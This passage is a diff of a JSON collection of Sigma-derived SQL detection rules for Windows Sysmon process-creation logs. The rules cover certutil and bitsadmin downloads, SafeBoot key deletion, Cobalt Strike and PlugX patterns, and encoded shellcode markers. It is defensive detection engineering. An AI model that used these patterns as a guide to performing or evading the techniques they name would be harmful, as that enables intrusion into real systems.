'\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_schtasks_guid_task_name.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "status": "test", + "description": "Detects a service binary running in a suspicious directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "Java Running with Remote Debugging", - "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "title": "Suspicious Download Via Certutil.EXE", + "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "status": "test", - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_remote_debugging.yml" + "filename": "proc_creation_win_certutil_download.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", - "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "File Download Via Bitsadmin", + "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "status": "test", + "description": "Detects usage of bitsadmin downloading a file", + "author": "Michael Haag, FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_bitsadmin_download.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execute From Alternate Data Streams", + "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "status": "test", + "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1485" - ], - "falsepositives": [ - "System administrator usage" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.t1564.004" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" - }, - { - "title": "Suspicious SysAidServer Child", - "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", - "status": "experimental", - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + "filename": "proc_creation_win_susp_alternate_data_streams.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", - "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "status": "test", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "Suspicious Copy From or To System32", - "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "title": "Abusing Findstr for Defense Evasion", + "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", "status": "test", - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" ], "falsepositives": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" + "Administrative findstr usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR Image LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_copy_system32.yml" + "filename": "proc_creation_win_lolbin_findstr.yml" }, { - "title": "Suspicious Child Process Created as System", - "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "status": "test", - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_child_process_as_system_.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.s0013", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help 